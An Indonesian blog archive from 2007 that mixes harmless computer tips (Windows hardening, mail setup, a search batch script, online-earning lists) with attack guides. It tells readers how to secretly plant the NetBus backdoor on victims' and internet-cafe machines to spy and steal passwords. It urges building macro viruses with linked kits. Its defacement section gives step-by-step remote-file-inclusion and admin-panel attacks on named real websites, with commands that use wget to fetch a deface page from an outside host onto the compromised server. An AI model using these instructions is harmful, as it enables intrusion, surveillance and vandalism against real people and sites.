Rabu, 31 Oktober 2007

Menangkal serangan Hacker

1. Memblokir Remote Access => Utk mencegah PC anda diambil alih oleh Hacker,nonaktifkan Remote Access. Dlm menu Start, klik kanan pada "My Computer" & pilih "Properties". Maka ada tampilan "System Properties", kemudian pilih tab "Remote", singkirkan/hilangkan tanda ( V ) yg ada didepan semua option yg ada utk menonaktifkannya. Kemudian klik "OK".

2. Menghapus User Account yg tdk terpakai => Pada "Windows XP Professional" terdapat beberapa user account yg dapat diakses melalui trojan & dimanfaatkan utk melakukan penyerangan. Utk menyingkirkannya pilih menu Start, pilih "Control Panel", pilih "Performance and Maintenance". Kemudian pilih "Administrative Tools", Klik 2 kali "Computer Management". Pilih "Local Users and Groups", pada sisi kanan klik 2 kali pd bagian "Users". Hapuslah account2 lama yg tdk anda gunakan ( gambar users yg ada tanda X ). Kemudian tutuplah tampilan2 tadi.

3. Menutup celah NetBIOS => File2 dokumen anda bisa diakses melalui Internet maka nonaktifkanlah NetBIOS. Dlm menu Start, klik kanan pada "My Network Place" & pilih "Properties". Maka ada tampilan "Network Connections". Kemudian klik kanan icon koneksi internet yg tersedia, pilih "Properties". Jika ada tampilan, pilih tab "Networking". Beri tanda ( V ) yg ada didepan "Internet Protocol (TCP/IP), kemudian klik tab "Properties" yg ada dibawahnya. Maka ada tampilan "Internet Protocol (TCP/IP) Properties", pilih tab "Advanced". Tampilan ada lagi "Advaced TCP/IP Settings", pilih tab "Wins", lalu pilih "Disable NetBIOS over TCP/IP. Klik 'OK".

4. Penanggulangan terhadap BO2K pada Windows 9x => BO2K dapat dilacak dgn scanning port. Biasanya pd Windows 9x yg terbuka portnya hanya satu yaitu port 139 (NetBios). Oleh karena itu perlu dicurigai jika kita mengetahui ada port lain selain port 139 yg terbuka. Program anti virus yg beredar saat ini dapat mendeteksi keberadaan program ini. Pastikan anda sudah melakukan download versi terbaru dari program anti virus. Rajin2 lah membuka registrasi Windows. Biasanya pd Windows 9x, karena BO2K menanamkan dirinya pada

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\

CurrentVersion\RunServices"

atau pada

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\

CurrentVersion\Run".

5. Pengamanan BIOS pada Server => BIOS merupakan perangkat lunak aras rendah yg berguna utk melakukan konfigurasi atau manipulasi hardware pada PC berbasis x86. MS Windows maupun Lilo dari Linux menggunakannya utk menentukan prosedur melakukan booting pada PC anda. Anda perlu memproteksi BIOS anda dgn memberi password padanya. Cara ini juga berguna utk mencegah penggunaan booting up melalui floppy disk. Cara ini tdk memberi perlindungan secara maksimal pada PC anda, namun dapat mempersulit org lain utk mengacak2 PC anda. Perlu diingat bahwa BIOS saat ini menggunakan metode flashroom, yg memungkinkan kita utk mengubah konfigurasi atau bahkan menghapusnya sama sekali.

6. Penyalahgunaan CGI Shell pada Unix/Linux => Ada beberapa cara yg cukup ampuh utk menanggulanginya :
a. Anda pasang Chrooted-Jail pada Apache anda sehingga perintah yg dapat dijalankan dapat anda batasi.
b. Utak-atik Source Code dari fasilitas CGI yg akan anda berikan misalnya Perl, kemudian anda matikan fasilitas fungsi system ( )…
c. Minimalisasi terjadinya eksploit local pada sistem anda dgn sering mengutak-atik & mengikuti perkembangan berita seputar sekuriti.

7. Menghapus komponen COM yg tdk dibutuhkan pd Windows 2000/XP => Beberapa komponen COM yg tdk dibutuhkan oleh hamper semua aplikasi harus dihapus. Pertimbangkan dulu sebelum menghapusnya karena setiap komponen saling berhubungan dgn file system & dictionary object. Dalam menu Start pilih Internet Explorer, pada menu”Tools” pilih “Internet Options”. Jika ada tampilan, pilih tab “Connections”. Didalam “Dial-up and Virtual Private Network Setting” hapus COM yg tdk dibutuhkan dgn mengkliknya lalu pilih “Remove”. Kemudian klik “OK’.

8. Mengaktifkan Firewall => Agar Hacker & penyerang tidak sampai ke PC anda, dibutuhkan sebuah Firewall. Dengan Firewall, anda dapat memblokir beberapa port yg kerap diserang Hacker. Kami sarankan anda memakai McAfee Personal Firewall Plus 2004, McAfee Internet Security Suite 6.0 & ZoneAlarm.

9. Menginstalasi Anti Virus => Software antivirus tidak hanya menyingkirkan virus, worm, atau file perusak lainnya tetapi juga melindungi PC dari ancaman serangan Script di website. Kami sarankan anda memakai program antivirus McAfee VirusScan Professional 8.0, McAfee SpamKiller 5.0 & McAfee Worm Removal Plus.

10. Jangan anda melakukan chatting di MIRC sebelum tips diatas dipraktekkan, kalo tidak PC anda akan diserang oleh Hacker karna IP anda bisa diliat melalui MIRC.

CATATAN : Tips ini telah dipraktekkan pada Windows XP.

Menjahili orang lain dengan Netbus

NetBus merupakan backdoor yang berjalan di sistem operasi Windows 9x dan NT. Dengan Netbus tersebut banyak hal menyenangkan yang bisa Anda lakukan, diantaranya adalah :

1. Membuka dan menutup CD-ROM Drive.
2. Melakukan shut down, log off, reboot dan power off.
3. Mengontrol gerakan mouse dan keyboard.
4. Menutup program.
5. Mengirimkan pesan atau text.
6. Memata-matai komputer "korban".
7. Mengarahkan komputer "korban" sehingga membuka URL tertentu.

Untuk menjalankan NetBus dibutuhkan 2 buah file, yaitu NetBus.exe dan Patch.exe (tapi nama file tersebut bisa saja diganti dengan nama yang lain). NetBus.exe merupakan file yang diletakkan di komputer kita, sedangkan Patch.exe diletakkan di komputer "korban".

Ada beberapa cara untuk "menanam" file Patch.exe di komputer "korban". Misalnya dengan mengirimkan sebagai attachment saat Anda mengirim email. Jika penerima email tersebut mengeksekusi file Patch.exe maka file tersebut akan ter-copy ke directory Windows ( pada komputer "korban"). Cara lain adalah (ini yang lebih asyik) letakkan file tersebut di semua komputer pada suatu warnet.

Jika berhasil Anda tinggal jalankan file NetBus.exe. Pada kolom Host name/IP Address isi dengan host name/ip address pada komputer si "korban". Kalau Anda bingung, gunakan fasilitas Scan yang akan memeriksa komputer mana saja yang telah terdapat file Patch.exe. Selesai mengisi ip address klik tombol Connect. Tunggu beberapa saat. Jika koneksi berhasil tombol Connect akan berganti menjadi tombol Cancel dan setelah itu Anda bisa melakukan apa yang Anda sukai, termasuk menyadap password email orang lain.

Untuk mendapatkan NetBus Anda bisa mendownloadnya dari HackersClub.

Peringatan :
Gunakan artikel ini untuk menambah pengetahuan Anda. Jangan melakukan hal-hal yang dapat merugikan orang lain.

Member Of AdvertisingBanner.com
AdvertisingBanner.com

© 2001 Klik Kanan
Dilarang memperbanyak artikel yang terdapat pada situs ini tanpa seizin Klik Kanan.

Mambuat virus makro sendiri



Berdasarkan sifat dan penyerangannya, virus komputer dapat dibedakan menjadi beberapa macam, misalnya virus boot sector, virus file, polymorphic virus, stealth virus, dan virus makro. Virus makro ini dapat menyerang pada dokumen MS Word, Excel atau Power Point. Virus makro ini termasuk virus yang paling banyak dijumpai di sekitar kita. Tentunya kita masih ingat dengan adanya virus Mellisa atau virus I Love You yang juga dapat kita masukkan ke dalam kategori virus macro.

Mengapa virus makro ini sering sekali kita jumpai? Jawabnya tentu saja karena populasi pengguna MS Office sangat banyak. Dengan pengguna yang cukup banyak tentunya virus makro dapat berkembang dengan cepat. Dengan melakukan pertukaran data *.doc (dokumen MS Word) yang telah terinfeksi maka sudah cukup untuk membuat semua dokumen menjadi terinfeksi.

Yang menarik, bagaimana cara membuat virus makro tersebut? Kalau Anda seorang programmer, dengan bantuan berbagai referensi tentunya mudah saja untuk belajar membuat virus makro. Masalahnya bagaimana kalau kita sama sekali tidak menguasai bahasa pemrograman?

Tenang saja, di internet banyak sekali software yang dapat digunakan untuk membuat virus makro. Salah satunya adalah SkamWerks Lab. Dengan fasilitas Virii Wizard, kita dapat membuat virus mulai dari awal sampai selesai. Saat menggunakan Virii Wizard, kita dapat menuliskan pembuat virusnya, nama virus, dan makro-makro yang akan dimasukkan ke dalam virus. Nah, daripada penasaran, silakan Anda cepat-cepat mencobanya sendiri. Tentunya setelah Anda mendownload programnya diwww.klik-kanan.com/forum/swlabs.zip

Jika berminat, Anda bisa mendapatkan software-software lain yang dapat digunakan untuk membuat virus www.savira.8m.com. Koleksinya sangat lengkap!

Selamat mencoba!

Lumpuhkan Deepfreeze

Untuk Uninstall program ini atau melakukan perubahan
yang permanen pada windows, misalnya install program
baru, dibutuhkan password yang di set pada saat
install DeepFreeze.

Tanpa password ini jangan harap anda dapat merubah
setting komputer anda, jadi bisa dibayangkan jikalau
anda lupa password tersebut (mungkin yang anda lakukan
adalah memformat hardisk tersebut).

Namun jika anda mengalaminya jangan khawatir, ikuti
langkah-langkah berikut, mudah-mudahan masalah anda
dapat terselesaikan.

1. Download "XDeepFreeze" di
http://geocities.com/macancrew/xdeepfreeze.zip

2. Ekstrak ke C:\XDeepfreeze

3. Jalankan "Run_Me.exe" yang akan menghasilkan file
"mcr.bat" dan "XDeepFreeze.exe" akan terload.

4. Pada XDeepFreeze, Tekan "Stop DeepFreeze", untuk
menghentikan "frzstate.exe"

5. Pada XDeepFreeze, Tekan "Clean Registry", untuk
membersihkan registry yang dibuat deepfreeze pada saat
install.

6. Untuk masuk ke MS-Dos Mode, Jalankan "command.com"
(Sudah disertakan pada "xdeepfreeze.zip")

7. Jalankan "mcr.bat" (Berisi perintah yang akan
menghapus file "persifrz.vxd")

8. Ketik "Exit" untuk masuk ke Windows kembali.
Dan.....DeepFreeze tidak berfungsi lagi.

Silahkan install ulang DeepFreeze, ingat dan catat
baik-baik password yang anda gunakan.
Jika anda lupa lagi lakukan kembali cara diatas

Setting MS Outlook untuk Email Yahoo


Berbeda dengan email Yahoo.com, email Yahoo.co.id disertai dengan fitur SMTP dan POP3 gratis. Dengan demikian Anda dapat mengakses (mengirim dan menerima) email dengan menggunakan email client seperti MS Outlook, MS Outlook Express, The Bat, Thunderbird, dll.

Selain itu Anda juga bisa mengakses email Yahoo.co.id dari handphone Anda. Tentunya jika handphone Anda support fitur email SMTP dan POP3.

Pertama Anda login dulu ke email Yahoo Anda dan lakukan konfigurasi sebagi berikut:

1. Klik menu/link Opsi yang ada di sebelah kanan agak ke atas.
2. Klik menu/link Akses dan Penerusan POP.
3. Klik pada pilihan (radio button) Akses Web & POP lalu klik tombol Simpan.

Selanjutnya buka program MS Outlook Express dan lakukan setting seperti di bawah ini:

1. Klik menu Tools - Accounts.
2. Pindah ke tab Mail.
3. Klik menu Add - Mail.
4. Isi Display Name dengan nama Anda.
5. Isi email address dengan email Yahoo Anda, misalnya emaillatihanku@yahoo.co.id
6. Isi Incoming mail (POP3, IMAP, or HTTP) server dengan pop.mail.yahoo.co.id
7. Isi Outgoing mail (SMTP) server dengan smtp.mail.yahoo.co.id
8. Isi Account name dengan email login Anda. Kalo email Anda emaillatihanku@yahoo.com maka Anda isi Account name dengan emaillatihanku.
9. Isi Password dengan password email Anda.
10. Klik Finish.
11. Pada form Internet Accounts, pilik email yang baru saja Anda buat dan klik Properties.
12. Pindah ke tab Advanced.
13. Pada isian Server Port Numbers - Outgoing mail (SMTP) diisi dengan 465.
14. Pada isian Server Port Numbers - Incoming mail (POP3) diisi dengan 995.
15. Beri tanda check (centhang) pada This server requires a secure connection (SSL).
16.
17. Klik tombol OK.

Sekarang silakan Anda coba download email dari Yahoo. Caranya, klik icon Send/Recv dan pilih nama email yang tadi Anda buat. Atau bisa juga klik icon Send/Recv - Receive All.

Jika Anda sudah menyetting MS Outlook Express Anda dengan benar maka Anda dapat mendownload email dari Yahoo Anda.

Cek nomor IP orang lain


IP Address merupakan identitas unik untuk setiap komputer yang terhubung dalam jaringan, baik lokal maupun internet.

Saat Anda melakukan koneksi ke internet maka ISP (Internet Service Provider) yang Anda pakai akan memberi anda IP Address (ip publik) secara otomatis (IP address tersebut berbeda dengan ip address untuk jaringn lokal Anda).

Untuk mengecek IP Address yang diberikan oleh ISP saat Anda melakukan koneksi ke internet, Anda bisa mengunjungi situs:

http://ip-adress.com/

Saat Anda membuka situs tersebut maka secara otomatis akan ditampilkan ip address, negara, kota ISP dan nama ISP yang Anda gunakan, contohnya seperti gambar di bawah ini:

Cek IP Address via ip-adress.com

Tutorial Batch Programming

Waaaah...sekarang dah bisa tenang soalx UAS udah selesai jd disempetin buat nulis artikel. Buat yang masih UAS semangat coy..kl pengen jawaban smsin-aq aja, ntar aq blsin jawabannya..:::

Ok, Pemirsa ketemu lagi dengan saya, ***_**. Di pagi yang cerah ini kita akan membahas tentang Batch Programming, apa itu? Pemrograman setumpuk (versi linguist). Langsung saja kita g usah berlama-lama lagi, cz semakin lama kita akan semakin bosan..

Sering Menggunakan fasilitas search engine seperti Gugel, yaho, or em-es-en..Pernah bermimpi menggunakan batch file untuk mencari sesuatu tanpa harus membuka browser terlebih dahulu..kalau belum sekarang saya akan mewujudkan impian anda…:

HERE is THE CODE
(tested on Windows XP sp 2)

code:
------------------------------------start script----------------------------------------
@echo off
TITLE Internet Search
mode 27,10
:start
(set i=)
(set g=)
(set y=)
(set m=)
cls
echo --------------------------
echo [ Available SearchEngine ]
echo --------------------------
echo [ 1. Google ]
echo [ 2. Yahoo ]
echo [ 3. MSN ]
set /p i=Choose SearchEngine:
if not defined i goto start
if "%i%"=="1" goto google
if "%i%"=="2" goto yahoo
if "%i%"=="3" goto msn
goto start

:google
set /p g=Google Search:
if not defined g goto start
set g=%g: =+%
set g=%g:+/= %
call :gsearch %g%
goto start
:gsearch
if /i "%2"=="" start http://www.google.com/search?q=%1
if /i "%2"=="w" start http://www.google.com/search?q=%1
if /i "%2"=="i" start http://images.google.com/images?q=%1
if /i "%2"=="v" start http://video.google.com/videosearch?q=%1
goto :eof

:yahoo
set /p y=Yahoo Search:
if not defined y goto start
set y=%y: =+%
set y=%y:+/= %
call :ysearch %g%
goto start
:ysearch
if /i "%2"=="" start http://search.yahoo.com/search?p=%1
if /i "%2"=="w" start http://search.yahoo.com/search?p=%1
if /i "%2"=="i" start http://images.search.yahoo.com/search/images?p=%1
if /i "%2"=="v" start http://video.search.yahoo.com/search/video?p=%1
goto :eof

:msn
set /p m=MSN Search:
if not defined m goto start
set m=%m: =+%
set m=%m:+/= %
call :msearch %g%
goto start
:msearch
if /i "%2"=="" start http://search.msn.com/results.aspx?q=%1
if /i "%2"=="w" start http://search.msn.com/results.aspx?q=%1
if /i "%2"=="i" start http://search.msn.com/images/results.aspx?q=%1
if /i "%2"=="v" start http://search.msn.com/results.aspx?q=%1+mpeg
goto :eof
-------------------------------------end of script------------------------------------
Copy paste script diatas ,truz save dgn extensi *.bat
Masih bingung cara makenya?jelas aja kan belum dijelasain…piye to mas sampeyan iki…:
Berikut penjelasannya :

1. Tampilan awal :

Wow..keren juga....:p
Pada tahap ini untuk memilih search engine:
Tekan -1 untuk paman gugel
2 untuk om yahoo
3 untuk m'pok em-es-en
Truz tekan enter..
Lalu, jreng tiba2muncul penampakan pesan seperti gambar dibawah…

2. Masukkan Keyword/Syntax


Di tahap ke-2 ini tinggal ketik aja kata2 yang sering kamu cari di gugel.
Syntax : Keyword [parameter]

Parameter:

/w = untuk mencari web
/i = untuk mencari images/gambar
/v =untuk mencari video/film
misalnya : ingin mencari artis selingkuh ketik aja :
web = artis selingkuh /w
gambar = artis selingkuh /i
video = artis selingkuh /v

Sudah jelas kan, kalau sudah kita sudahi saja acara ini , atas segala salah kata mohon disimpan saja dalam hati dan jika ada kesamaan tokoh nama alamat dan profesi itu merupakan kensengajaan dari penulis :p
Selamat Malam..sampai jumpa dilain Kesempatan...

-------------------
…Quote…
-------------------

Kalau mau tips & trik yang lebih X-treme lagi :
Give your voice on : http://www.klik-kanan.com/forums/index.php?topic=5119.0
Kritik-Saran-Tanya-Jawab-salam k'nal-or Pengen nomer HP : PM aja yach..:::

Member Penulis:

www.klik-kanan.com/forum
www.Computerhope.com/forum
www.echo.or.id
www.ss64.org

Akhir kata : Jangan Pernah Membantah Perkataan Orangtua karena mulutmu akan diSobek-Sobek.

Salam/Regard

Fen_Li
'still newbie kid'

Beenz, mata uang di internet

Seneng surfing sembari cari duit ? Anda bisa, tapi uangnya bukan berupa dollar, rupiah atau poundsterling, tapi beenz. Mata uang ini mulai diperkenalkan oleh Charles Cohen, seorang pendiri www.beenz.com. Ia menggagas mata uang ini dan mendorongnya untuk menjadi mata uang resmi di jagat maya.
Caranya begini. Pertama buka rekening di Beenz.com, lalu gandakan nilainya dengan mengunjungi situs-situs tertentu. Situs-situs ini akan memberi imbalan beenz untuk tiap informasi pribadi yang diberikan pad pengelolanya, atau sekedar karena seseorang mengunjungi situs tersebut beberapa saat.
"Anda akan memperoleh imbalan, hanya karena hadir di situs itu," kata Philip Letts, CEO Beenz.com. Jika Anda sudah bisa mengumpulan Beenz dalam jumlah banyak, Anda dapat membelanjakannya di 200 situs e-commerce, seperti MP3.com, ishop, dan Jellybeenz Gifts. Mereka menerima beenz sebagai alat pembayaran resmi.
Charles Chohen boleh jadi bukan sekedar mimpi untuk membuat Beenz sebagai mata uang masa depan. Colombus Bank and Trust sudah mengeluarkan beenz rewardzcard Master Card, yang memungkinkan pemilik Beenz membelanjakan uang maya ini di toko dan restoran yang ada dalam jaringan Master Card.
Bulan lalu, Beenz.com malah menerbitkan kartu debet yang memungkinkan pelanggan menukar Beenz dengan mata uang lokal. Kini tak kurang dari 1 milyar Beenz telah beredar di dunia maya. Nilai sementaranya, 200 Beenz setara dengan US$ 1 atau sekitar Rp 9400,-.
© 2001 Klik Kanan
Dilarang memperbanyak artikel yang terdapat pada situs ini tanpa seizin Klik Kanan.

Cara nge'Deface Situs

Disini kamu mesti usaha sendiri mencari targetnya (malingsia).
Langkah-langkah nya :

1. http://www.hilger-it.de/index.php?go=main.php

2. Kemudian hapus/delete main.php di url/browsing sehingga menjadi http://www.hilger-it.de/index.php?go=

3. Masukkan file inject ini di belakang situs tadi :

http://k.domaindlx.com/batamhacker/sql2.htm

Misal nya http://www.hilger-it.de/index.php?go...crew/sql2.htm?

4. Maka yang keluar di situs target adalah : /homepages/39/d143393561/htdocs/hilger

5. Masukkan file deface ini : http://k.domaindlx.com/batamhackercrew/jh.htm

6. Di kolom Execute Command ketik :

wget http://k.domaindlx.com/batamhackercrew/jh.htm

7. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya: http://www.hilger-it.de/jh.htm
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing.

================================================== ===

Deface situs Catalog PHP


1. http://www.rascom.at/catalog/product...be164a40e92dc8 atau http://www.rascom.at/catalog/default.php?cPath=2

2. Kemudian hapus/delete product_info.php?products_id=322&PHPSESSID=a7d2068 8baf4b05261be164a40e92dc8 di url/browsing sehingga menjadi http://www.rascom.at/catalog/

3. Masukkan bug ini di belakang situs tadi :

includes/include_once.php?include_file=

Misal nya http://www.rascom.at/catalog/include...?include_file=

4. Masukkan file inject ini di belakang nya lagi :

http://k.domaindlx.com/batamhackercrew/sql.htm

Misal nya http://www.rascom.at/catalog/include...rcrew/sql.htm?

5. Di kolom cmd ketik :

find / -perm 777 -type d atau find / -perm 755 -type d

Tunggu beberapa saat.......

6. Kalo foldernya Permision Denied berarti kita tidak bisa apa2 di folder itu. Cari folder yg tidak ada tulisan Permision Denied.

Contoh Permision Denied :

find: /usr/share/ssl/CA: Keine Berechtigung
find: /var/empty/sshd: Keine Berechtigung
find: /var/spool/cups: Keine Berechtigung

Kita cari yg lain tapi usahakan foldernya yg /var/www/ kalo tidak ada juga tidak apa2.

Contoh folder yg bisa : /var/www/html/www.rascom.at/catalog/images

7. Masukkan file deface ini :

http://k.domaindlx.com/batamhackercrew/jh.htm

8. Di kolom cmd ketik :

cd /var/www/html/www.rascom.at/catalog/images;wget http://k.domaindlx.com/batamhackercrew/jh.htm

Tunggu beberapa saat.......

10:35:02 (4 KB/s) - `jh.htm' saved

Itu artinya sukses ke save

9. Cara lihat hasil nya :

http://www.rascom.at/catalog/images/[file deface tadi]

10. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya : http://www.rascom.at/catalog/images/jh.htm
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing.

================================================== ===

Deface situs cPath


1. http://www.new2u.us/index.php?cPath0

2. Kemudian hapus/delete index.php?cPath0 di url/browsing sehingga menjadi http://www.new2u.us

3. Masukkan bug ini di belakang situs tadi :

_admin_/file_manager.php atau admin/file_manager.php

Misal nya http://www.new2u.us/_admin_/file_manager.php

4. Skrg kamu udah masuk ke file server nya. Carilah file index.php trus klik file index.php tersebut.

5. Kemudian klik tab "Edit" di kolom yg sebelah kanan.
Hapus script yg ada di kolom tsb trus ketik Hacked by BatamHacker
Trus klik tab "Save".

6. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya : http://www.new2u.us
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing.

================================================== ===

Deface situs Mambo


1. http://sukan.upm.edu.my/Buletin/inde...id=17&Itemid=2

2. Kemudian hapus/delete option=com_content&task=view&id=17&Itemid=2 di url/browsing sehingga menjadi http://sukan.upm.edu.my/Buletin/index.php?

3. Masukkan bug ini di belakang situs tadi :

_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=

Misal nya http://sukan.upm.edu.my/Buletin/inde...UEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=

4. Masukkan file inject ini di belakang nya lagi :

http://k.domaindlx.com/batamhackercrew/sql2.htm

Misal nya : http://sukan.upm.edu.my/Buletin/inde...UEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://k.domaindlx.com/batamhackercrew/sql2.htm?

5. Di kolom Execute Command ketik :

find / -perm 777 -type d atau find / -perm 755 -type d

Tunggu beberapa saat.......

6. Kalo foldernya Permision Denied berarti kita tidak bisa apa2 di folder itu. Cari folder yg tidak ada tulisan Permision Denied.

Contoh Permision Denied :

find: /var/tux: Permission denied
find: /var/gdm: Permission denied
find: /tmp/ssh-XXcnJoE9: Permission denied
find: /tmp/orbit-root: Permission denied

Kita cari yg lain tapi usahakan foldernya yg /var/www/ kalo tidak ada juga tidak apa2.

Contoh folder yg bisa : /opt/orion

7. Masukkan file deface ini :

http://k.domaindlx.com/batamhackercrew/jh.htm

8. Di kolom Execute Command ketik :

cd /opt/orion;wget http://k.domaindlx.com/batamhackercrew/jh.htm

Tunggu beberapa saat.......

10:35:02 (4 KB/s) - `jh.htm' saved

Itu artinya sukses ke save

9. Cara lihat hasil nya :

http://sukan.upm.edu.my/Buletin/opt/orion/[file deface tadi]

10. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya : http://sukan.upm.edu.my/Buletin/opt/orion/jh.htm
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing.

================================================== ===

url yg diketik disini (disetiap bagian no 1) adalah sebagai contoh perumpamaan dan bukan untuk dibikin target, untuk targetnya cari sendiri

segitu dulu nanti yg lainnya nyusul di lain waktu.........

Cari uang di internet

Beragam cara yang bisa ditempuh untuk mendapatkan dollar dari internet mulai dari baca email, surfing, main game bahkan chatting. Kelihatannya tak masuk akal. Tapi itulah kenyataannya. Yang jadi pertanyaan, dari mana mereka mendapatkan uang untuk membayar kita ? Jawabannya mudah saja. Mereka mendapatkan uang dari perusahaan yang memasang iklan di web atau view bar mereka.

Biar tidak penasaran Anda bisa mencoba beberapa situs atau program di bawah ini yang diyakini akan membayar kepada anggotanya. Sebagai tambahan, setelah (Anda mendaftar dan) uang Anda telah mencapai jumlah tertentu maka mereka akan mengirimkan bank draft check yang bisa Anda cairkan di banyak bank di Indonesia.

EPilot
Situs ini mirip dengan search engine yang telah Anda kenal, tapi yang membedakan adalah situs ini akan membayar Anda sebesar 5 dollar AS saat pertama Anda mendaftar ditambah 0,03 dollar AS tiap Anda melakukan pencarian.

The Mail
The Mail mirip dengan layanan email lainnya seperti Yahoo, Hotmail, Boleh Mail, dll. Yang membedakan jika Anda pakai The Mail adalah Anda akan mendapat $ 0,0025 untuk setiap email yang Anda baca, tidak peduli dari mana datangnya email tersebut. Semakin banyak email yang datang ke mail box Anda semakin banyak pula uang yang akan Anda dapatkan. Untuk memperbanyak email yang masuk ke mail box Anda, Anda bisa mengikuti berbagai mailing list. Silakan lihat daftar mailing list di E Groups.

TerraShare
Dengan membuat web site di TerraShare maka Anda punya kesempatan untuk meraup dollar. Karena setiap 1000 kali penampilan banner Anda akan mendapatkan 1,25 dollar AS. Seperti layaknya layanan web hosting gratis lainnya, banner tersebut akan diletakkan pada setiap halaman web Anda.

CashFiesta
Yang ini cocok buat Anda yang seneng surfing. Setelah Anda mendaftar ke CashFiesta maka Anda harus mendownload dan menginstall viewbar mereka pada komputer Anda. Nah, saat Anda online jalankan viewbar tersebut. Jadi selama Anda online dan menggunakan viewbar mereka, Anda akan memperoleh dollar. Ada pun besarnya adalah 0.60 dollar AS per jam.

Sedangkan situs atau program yang diyakini tidak akan membayar kepada anggotanya alias program bohong-bohongan adalah sebagai berikut :

Surfing :
GetPaid4, Cast-net Solution, DotAd, Go4Billion, MakingCash, PrizeWindow, SurfAd, SurfMiles, Surfing2Cash, SharkHunt, Itadsup, Urge2Net, Paybar, VIPBenefits.

Email
AmazingSolutions, ClickMail, DoughMail, Epidemic, EqualPoints, E-Cash, MiracleMail, TresPass, Opt-In, PaidEmail, Payolaemail.

Lainnya
Alliance4Wealth, CashActive, ClickyCash, DataCash, RockSurfer, TheStudentSaver, ColorStamp, PaidZone, WePayAll, AdPerks, SurfBuzz, Ad4Me, Zemtro, FunnyMoney, Clicks2Asia, ClickZones, ShopVault, Profinity, RewardBuddies.

Tips Adsense

Bagi anda yang memasang Adsense di blog / website, pernahkah mendapat 0.01 USD ? Hihihi, nyebelin dan sewot juga ya melihat angkanya. Untuk menghindari nilai earning yang terlalu kecil, kita bisa menggunakan 2 tips, yaitu :

1. Menggunakan Competitive Ads Filter
2. Mencari Keyword dengan Earning Tinggi alias High Paying Keyword (HPK)
Cara pertama bisa dilakukan dengan memasukkan daftar website yang menyebalkan pada daftar filter. Hal ini bisa berjalan efektif, namun kadangkala justru menimbulkan keluarnya iklan PSA (Public Service Ads).

Cara kedua relatif lebih mudah. Kita bisa memanfaatkan Google Adwords Keyword Tool untuk mencari keyword dengan nilai earning yang cukup tinggi. Cara yang paling efektif adalah mencari keyword yang sesuai dengan tema blog / website kita. Misalnya, jika kita memiliki blog dengan tema Hosting, kita bisa mencari daftar HPK berdasarkan keyword yang kita masukkan, kemudian memilih "Cost and Ads Position Estimates" pada pilihan "Choose data to display".

Selain tools pencarian berdasarkan keyword, Google juga menyediakan pencarian keyword sesuai dengan blog yang kita miliki. Ini ada pada pilihan Site-Related Keywords

Untuk menerapkan tips ini, jangan terlalu terpaku pada keyword yang disampaikan. Lebih baik kita tetap menulis artikel seperti biasanya, baru mencoba menyesuaikannya dengan HPK. Jangan terbalik. Jika terbalik, HPK tidak didapat, iklan dengan earning kecilpun jarang menyapa. Apalagi jika HPK yang dipaksakan tidak sesuai dengan tema blog / website, jika tampilpun sulit di klik oleh pengunjung :-).

Freegate 6.5 Mampu Menerobos Blokade Internet

Dynamic DNS menyediakan software untuk menerobos blokade internet
yang dilakukan rezim Komunis China.


Dynamic DNS mengeluarkan Freegate versi 6.5 pada 9 September kemarin yang menggabungkan langkah-langkah untuk meningkatkan kemampuan membongkar blokade internet, Freegate 6.5 dirancang oleh pengguna berpengalaman masa kini tergagas dan akan berdaya- guna membongkar blockade. Versi ini juga termasuk update otomatis yang menginformasikan kepada pengguna apabila sebuah versi terbaru dikeluarkan.

Freegate 6.5 dapat di download di https://us.dongtaiwang.com/loc/download.php Selain tampil dengan fasilitas dan fungsi yang lebih baik, Dynamic DNS juga bermitra dengan kelompok-kelompok lain untuk membongkar blokade internet yang dilakukan oleh rejim komunis China:

1. Dynamic DNS akan bekerja sama dengan NTDTV guna menayangkan alamat-alamat website dinamis dalam laporan berita harian lewat TV satelit. Sehingga, bila perangkat lunak diblok atau versi upgrade tidak tersedia, para pengguna dapat langsung menuju website Dynamic DNS dan men-download perangkat lunak versi terbaru.

2. Dynamic DNS telah menghimpun ribuan agen CGI yang dapat digunakan untuk men-download perangkat lunak terbaru yang tentunya membuat blokade semakin sulit dilakukan.

3. Freegate 6.5 dan versi berikutnya akan menyediakan ‘tanda tangan digital’ (digital signature) untuk mengesahkan produk Dynamic DNS. Pengguna internet dapat men-download kunci publik Dynamic DNS dan men-download software melalui perangkat lunak P2P seperti emule atau BT. Setelah itu, perangkat tersebut dapat mendeteksi keaslian software. Para pengguna yang mempromosikan Freegate di internet harus menyertakan digital signature di dalam software. Dynamic DNS akan menyediakan instruksi manual untuk verifikasi tanda tangan GPG.

4. Dynamic DNS telah meluncurkan EasyCapture bagi penggunanya untuk mengumpulkan informasi apabila menjumpai masalah:
https://us.dongtaiwang.com/loc/softw...apture-pkg.zip
5. Dynamic DNS akan menyediakan website non-dinamis bagi pengguina untuk men-download perangkat lunak versi terbaru:
https://us.dongtaiwang.com/loc/fg.exe .
Sementara itu, para user direkomendasikan untuk menngunakan berbagai pendekatan alternatif yang disediakan oleh Dynamic DNS untuk membongkar blokade, yang akan di-upgrade terus menerus:
https://us.dongtaiwang.com/loc/howto.php

Mempertimbangkan kemungkinan rejim Komunis China memperbaharui blokade web-nya dikemudian hari, Dynamic DNS tidak menganggap hal ini sebagai masalah bagi sejumlah besar pengguna internet untuk membantu mengumpulkan informasi.

Berikut ini daftar tambahan dari perangkat lunak yang dapat di-download untuk membongkar blokade itu:

GPass software: http://www.gpass1.com/download_cn.php
FirePhoenix (FP): http://firephoenix.edoors.com/chinese.html
Ultrareach. Net: http://wujie.net/wujie.htm
GardenNetworks: http://gardennetworks.com/download.htm

http://en.epochtimes.com/news/7-9-14/59755.html

Sabtu, 27 Oktober 2007

